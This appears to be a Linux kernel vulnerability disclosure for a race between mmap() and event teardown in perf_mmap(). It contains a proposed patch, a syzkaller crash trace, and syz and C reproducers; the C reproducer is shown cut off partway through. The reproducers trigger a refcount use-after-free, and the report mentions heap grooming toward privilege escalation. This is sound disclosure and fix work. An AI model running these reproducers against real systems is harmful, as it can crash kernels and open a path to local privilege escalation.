1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
